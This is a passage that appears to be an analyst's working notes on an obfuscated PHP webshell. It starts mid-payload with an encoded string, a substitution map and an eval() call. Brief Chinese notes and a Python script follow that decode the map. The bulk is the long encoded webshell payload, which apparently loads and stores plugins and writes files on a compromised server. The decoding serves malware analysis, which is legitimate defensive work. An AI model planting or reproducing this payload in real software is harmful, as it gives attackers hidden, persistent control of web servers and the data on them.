'Y4%Y4%Y4%Y4%YSvE%YS%Y4%NH%Nx%Y4%YSY.4-R%YS%YV%4H%4c%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%YSk7%YS%Y4%NH%Nx%Y4%Y0tksk%lG%YSk7'.
'%YS%lH%YV%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4LOhJ%Y4%04vL8ak1aPL%YA%Y0a%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y'.
'4%Y4%Y4%Y4%Y4LCas%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4%Y4L1vLaf%Y4%YA%Y0tksk%lG%YSk%YS%lH%Y4%NH%NH%Y4%YSL%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%'.
'4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LEk1%YA%Y0tksk%lG%YSt%YS%lH%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vLaf%Y4%YA%Y0tksk%lG%YSk%YS%lH%Y4%NH%NH%Y'.
'4%YST1piaX%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4%Y4%Y4af%YA%Y0tksk%lG%YSvk%YS%lH%Y4%NH%NH%Y4%YSktt%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%'.
'Y4%Y4Ov_T1piaX_ktt%YA%Y0tksk%lG%YST%YS%lH%YV%Y4%Y0tksk%'.
'lG%YSt%YS%lH%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%'.
'4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vLaf%YA%Y0tksk%lG%YSvk%YS%lH%Y4%NH%NH%Y4%YS8LF%YS%Ym%4'.
'H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4'.
'%Y4Ov_T1piaX_8LF%YA%Y0tksk%lG%YST%YS%lH%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%'.
'Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LOhJ%Y4%Y0tksk%lG%YSk7%YS%lH%NG%4H%4c%Y4%Y'.
'4%Y4%Y4%Y4%Y4%Y4%Y4LCas%YA%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4Ov_T1piaX_1Jkt%'.
'YA%Ym%NG%4H%4c%SH';
$wbaudyr = Array('1'=>'l', '0'=>'4', '3'=>'X', '2'=>'Z', '5'=>'L', '4'=>'0', '7'=>'k', '6'=>'y', '9'=>'Q', '8'=>'r', 'A'=>'8', 'C'=>'x', 'B'=>'J', 'E'=>'v', 'D'=>'N', 'G'=>'B', 'F'=>'m', 'I'=>'T', 'H'=>'D', 'K'=>'S', 'J'=>'o', 'M'=>'M', 'L'=>'e', 'O'=>'c', 'N'=>'3', 'Q'=>'K', 'P'=>'z', 'S'=>'7', 'R'=>'1', 'U'=>'j', 'T'=>'p', 'W'=>'I', 'V'=>'C', 'Y'=>'2', 'X'=>'n', 'Z'=>'b', 'a'=>'i', 'c'=>'A', 'b'=>'w', 'e'=>'O', 'd'=>'W', 'g'=>'6', 'f'=>'f', 'i'=>'g', 'h'=>'h', 'k'=>'a', 'j'=>'V', 'm'=>'9', 'l'=>'5', 'o'=>'H', 'n'=>'U', 'q'=>'q', 'p'=>'u', 's'=>'t', 'r'=>'P', 'u'=>'Y', 't'=>'d', 'w'=>'F', 'v'=>'s', 'y'=>'R', 'x'=>'E', 'z'=>'G');
eval/*htbhamhift*/(vjpsq($erowqloh, $wbaudyr));
}
对编码部分进行解码 进行处理,去掉单引号和换行
写一个python脚本,解析webshell
import urllib.parse
def vjpsq(encoded_str, code_map):
decoded_str = ''
for char in encoded_str:
if char in code_map:
decoded_str += code_map[char]
else:
decoded_str += char
return urllib.parse.unquote(decoded_str)
# 创建一个字符映射字典,与PHP代码中的映射相同
code_map = {
'1':'l', '0':'4', '3':'X', '2':'Z', '5':'L', '4':'0', '7':'k', '6':'y',
'9':'Q', '8':'r', 'A':'8', 'C':'x', 'B':'J', 'E':'v', 'D':'N', 'G':'B',
'F':'m', 'I':'T', 'H':'D', 'K':'S', 'J':'o', 'M':'M', 'L':'e', 'O':'c',
'N':'3', 'Q':'K', 'P':'z', 'S':'7', 'R':'1', 'U':'j', 'T':'p', 'W':'I',
'V':'C', 'Y':'2', 'X':'n', 'Z':'b', 'a':'i', 'c':'A', 'b':'w', 'e':'O',
'd':'W', 'g':'6', 'f':'f', 'i':'g', 'h':'h', 'k':'a', 'j':'V', 'm':'9',
'l':'5', 'o':'H', 'n':'U', 'q':'q', 'p':'u', 's':'t', 'r':'P', 'u':'Y',
't':'d', 'w':'F', 'v':'s', 'y':'R', 'x':'E', 'z':'G'
}
# 经过编码的字符串
encoded_str = '''
%4H%4c%4H%4c%04aXa_vLs%YA%YSL88J8_1Ji%YS%YV%Y4Dn55%Ym%NG%4H%4c%04aXa_vLs%YA%YS1Ji_L88J8v%YS%YV%Y44%Ym%NG%4H%4c%04aXa_vLs%YA%YSFkC_LCLOpsaJX_saFL%YS%YV%Y44%Ym%NG%4H%4c%04L88J8_8LTJ8saXi%YA4%Ym%NG%4H%4c%04vLs_saFL_1aFas%YA4%Ym%NG%4H%4c%4H%4c%4H%4caf%YA%YRtLfaXLt%YA%YYror_xe5%YY%Ym%Ym%4H%4c%SG%4H%4c%Y4%Y4%Y4%Y4tLfaXL%YA%YYror_xe5%YY%YV%Y4%YY%lVX%YY%Ym%NG%4H%4c%SH%4H%4c%4H%4caf%YA%YRtLfaXLt%YA%YYHWyxVIeyu_KxrcycIey%YY%Ym%Ym%4H%4c%SG%4H%4c%Y4%Y4%Y4%Y4tLfaXL%YA%YYHWyxVIeyu_KxrcycIey%YY%YV%Y4%YY/%YY%Ym%NG%4H%4c%SH%4H%4c%4H%4caf%Y4%YA%YRtLfaXLt%YA%YSc5yxcHu_ynD_R00OASOfgYNZkAYkkfagA8akZRgksaJRA%YS%Ym%Ym%4H%4c%SG%4H%4c%Y4%Y4%Y4%Y4tLfaXL%YA%YSc5yxcHu_ynD_R00OASOfgYNZkAYkkfagA8akZRgksaJRA%YS%YV%Y4R%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4Dn55%NG%4H%4c%Y4%Y4%Y4%Y4%Y0tksk_7L6%Y4%NH%Y4Dn55%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y0z5eGc5K%lG%YSOv_kpsh%YS%lH%Y4%NH%Y4%YSOAYSN4mm-NmR0-0OL0-ALfS-NLg4YlLkNAZl%YS%NG%4H%4c%Y4%Y4%Y4%Y4i1JZk1%Y4%Y0Ov_kpsh%NG%4H%4c%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_ZkvLg0_tLOJtL%YA%Y0aXTps%Ym%Y4%SG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YAvs81LX%YA%Y0aXTps%Ym%Y4%NV%Y40%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%YY%YY%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y07L6Ks8%Y4%NH%Y4%YYcGVHxwzoWBQ5MDer9yKInjd3u2kZOtLfihaU71FXJTq8vspEbC6P4RYN0lgSAm%YG/%NH%YY%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y07L6v%Y4%NH%Y4vs8_vT1as%YA%Y07L6Ks8%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y07L6v%Y4%NH%Y4k88k6_f1aT%YA%Y07L6v%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0a%Y4%NH%Y44%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y4%NH%Y4%YY%YY%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0aXTps%Y4%NH%Y4T8Li_8LT1kOL%YA%YY%Sx%lG%lxc-2k-P4-m%lV%YG%lV/%lV%NH%lH%Sx%YY%YV%Y4%YY%YY%YV%Y4%Y0aXTps%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4tJ%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0LXOR%Y4%NH%Y4%Y07L6v%lG%Y0aXTps%lG%Y0a%YG%YG%lH%lH%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0LXOY%Y4%NH%Y4%Y07L6v%lG%Y0aXTps%lG%Y0a%YG%YG%lH%lH%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0LXON%Y4%NH%Y4%Y07L6v%lG%Y0aXTps%lG%Y0a%YG%YG%lH%lH%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0LXO0%Y4%NH%Y4%Y07L6v%lG%Y0aXTps%lG%Y0a%YG%YG%lH%lH%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Oh8R%Y4%NH%Y4%YA%Y0LXOR%Y4%NV%NV%Y4Y%Ym%Y4%SV%Y4%YA%Y0LXOY%Y4%Nx%Nx%Y40%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Oh8Y%Y4%NH%Y4%YA%YA%Y0LXOY%Y4%Yg%Y4Rl%Ym%Y4%NV%NV%Y40%Ym%Y4%SV%Y4%YA%Y0LXON%Y4%Nx%Nx%Y4Y%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Oh8N%Y4%NH%Y4%YA%YA%Y0LXON%Y4%Yg%Y4N%Ym%Y4%NV%NV%Y4g%Ym%Y4%SV%Y4%Y0LXO0%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y4%NH%Y4%Y0JpsTps%Y4%Y4Oh8%YA%Y0Oh8R%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0LXON%Y4%YR%NH%Y4g0%Ym%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y4%NH%Y4%Y0JpsTps%Y4%Y4Oh8%YA%Y0Oh8Y%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0LXO0%Y4%YR%NH%Y4g0%Ym%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0JpsTps%Y4%NH%Y4%Y0JpsTps%Y4%Y4Oh8%YA%Y0Oh8N%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%Y4bha1L%Y4%YA%Y0a%Y4%NV%Y4vs81LX%YA%Y0aXTps%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0JpsTps%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4af%Y4%YA%YRfpXOsaJX_LCavsv%YA%YSfa1L_Tps_OJXsLXsv%YS%Ym%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fpXOsaJX%Y4fa1L_Tps_OJXsLXsv%YA%Y0X%YV%Y4%Y0t%YV%Y4%Y0f1ki%Y4%NH%Y4wk1vL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0FJtL%Y4%NH%Y4%Y0f1ki%Y4%NH%NH%Y4A%Y4%Nw%Y4%YSk%YS%Y4%Nc%Y4%YSb%YS%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0f%Y4%NH%Y4%04fJTLX%YA%Y0X%YV%Y4%Y0FJtL%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0f%Y4%NH%NH%NH%Y4wk1vL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y44%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vL%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YAav_k88k6%YA%Y0t%Ym%Ym%Y4%Y0t%Y4%NH%Y4aFT1JtL%YA%Y0t%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Z6sLv_b8assLX%Y4%NH%Y4fb8asL%YA%Y0f%YV%Y4%Y0t%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fO1JvL%YA%Y0f%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0Z6sLv_b8assLX%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4af%Y4%YA%YRfpXOsaJX_LCavsv%YA%YSfa1L_iLs_OJXsLXsv%YS%Ym%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fpXOsaJX%Y4fa1L_iLs_OJXsLXsv%YA%Y0fa1LXkFL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0fhkXt1L%Y4%NH%Y4fJTLX%YA%Y0fa1LXkFL%YV%Y4%YY8%YY%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0fOJXsLXsv%Y4%NH%Y4f8Lkt%YA%Y0fhkXt1L%YV%Y4fa1LvaPL%YA%Y0fa1LXkFL%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fO1JvL%YA%Y0fhkXt1L%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0fOJXsLXsv%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_iLs_Op88LXs_fa1LTksh%YA%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4s8aF%YAT8Li_8LT1kOL%YA%YY/%lV%YA%Yc%lV%Y0/%YY%YV%Y4%YS%YS%YV%Y4__wW5x__%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_tLO86Ts_ThkvL%YA%Y0tksk%YV%Y4%Y07L6%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Jps_tksk%Y4%NH%Y4%YY%YY%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fJ8%Y4%YA%Y0a%NH4%NG%Y4%Y0a%NVvs81LX%YA%Y0tksk%Ym%NG%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fJ8%Y4%YA%Y0U%NH4%NG%Y4%Y0U%NVvs81LX%YA%Y07L6%Ym%Y4%Yg%Yg%Y4%Y0a%NVvs81LX%YA%Y0tksk%Ym%NG%Y4%Y0U%YG%YG%YV%Y4%Y0a%YG%YG%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0Jps_tksk%Y4%NH%Y4Oh8%YAJ8t%YA%Y0tksk%lG%Y0a%lH%Ym%Y4%lx%Y4J8t%YA%Y07L6%lG%Y0U%lH%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0Jps_tksk%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_tLO86Ts%YA%Y0tksk%YV%Y4%Y07L6%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4i1JZk1%Y4%Y0Ov_kpsh%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4Ov_tLO86Ts_ThkvL%YAOv_tLO86Ts_ThkvL%YA%Y0tksk%YV%Y4%Y07L6%Ym%YV%Y4%Y0Ov_kpsh%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_LXO86Ts%YA%Y0tksk%YV%Y4%Y07L6%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4i1JZk1%Y4%Y0Ov_kpsh%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4Ov_tLO86Ts_ThkvL%YAOv_tLO86Ts_ThkvL%YA%Y0tksk%YV%Y4%Y0Ov_kpsh%Ym%YV%Y4%Y07L6%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_iLs_T1piaX_OJXfai%YA%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0vL1f_OJXsLXs%Y4%NH%Y4%04fa1L_iLs_OJXsLXsv%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_TJv%Y4%NH%Y4vs8TJv%YA%Y0vL1f_OJXsLXs%YV%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0OJXfai_TJv%Y4%YR%NH%NH%Y4wc5Kx%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai%Y4%NH%Y4vpZvs8%YA%Y0vL1f_OJXsLXs%YV%Y4%Y0OJXfai_TJv%Y4%YG%Y4NY%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4%04pXvL8ak1aPL%YAOv_tLO86Ts%YA8kbp81tLOJtL%YA%Y0OJXfai%Ym%YV%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vL%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4c88k6%YA%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y48Lsp8X%Y4%Y0T1piaXv%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_vLs_T1piaX_OJXfai%YA%Y0T1piaXv%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_LXO%Y4%NH%Y48kbp81LXOJtL%YAOv_LXO86Ts%YA%04vL8ak1aPL%YA%Y0T1piaXv%Ym%YV%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0vL1f_OJXsLXs%Y4%NH%Y4%04fa1L_iLs_OJXsLXsv%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_TJv%Y4%NH%Y4vs8TJv%YA%Y0vL1f_OJXsLXs%YV%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0OJXfai_TJv%Y4%YR%NH%NH%Y4wc5Kx%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0OJXfai_J1t%Y4%NH%Y4vpZvs8%YA%Y0vL1f_OJXsLXs%YV%Y4%Y0OJXfai_TJv%Y4%YG%Y4NY%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0vL1f_OJXsLXs%Y4%NH%Y4vs8_8LT1kOL%YA%Y0OJXfai_J1t%YV%Y4%Y0OJXfai_LXO%YV%Y4%Y0vL1f_OJXsLXs%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vL%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0vL1f_OJXsLXs%Y4%NH%Y4%Y0vL1f_OJXsLXs%Y4%Y4%YY%lVX%lVX//%YY%Y4%Y4Ftl%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%Ym%Y4%Y4%Y0OJXfai_LXO%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%04fa1L_Tps_OJXsLXsv%YAOv_iLs_Op88LXs_fa1LTksh%YA%Ym%YV%Y4%Y0vL1f_OJXsLXs%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_T1piaX_ktt%YA%Y0XkFL%YV%Y4%Y0ZkvLg0_tksk%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4Ov_iLs_T1piaX_OJXfai%YA%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%lG%Y0XkFL%lH%Y4%NH%Y4Ov_ZkvLg0_tLOJtL%YA%Y0ZkvLg0_tksk%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4Ov_vLs_T1piaX_OJXfai%YA%Y0T1piaXv%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_T1piaX_8LF%YA%Y0XkFL%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0T1piaXv%Y4%NH%Y4Ov_iLs_T1piaX_OJXfai%YA%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4pXvLs%YA%Y0T1piaXv%lG%Y0XkFL%lH%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4Ov_vLs_T1piaX_OJXfai%YA%Y0T1piaXv%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fpXOsaJX%Y4Ov_T1piaX_1Jkt%YA%Y0XkFL%NHDn55%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fJ8LkOh%Y4%YAOv_iLs_T1piaX_OJXfai%YA%Ym%Y4kv%Y4%Y0TXkFL%NH%Nx%Y0TOJXsLXs%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0XkFL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YAvs8OFT%YA%Y0XkFL%YV%Y4%Y0TXkFL%Ym%Y4%NH%NH%Y44%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%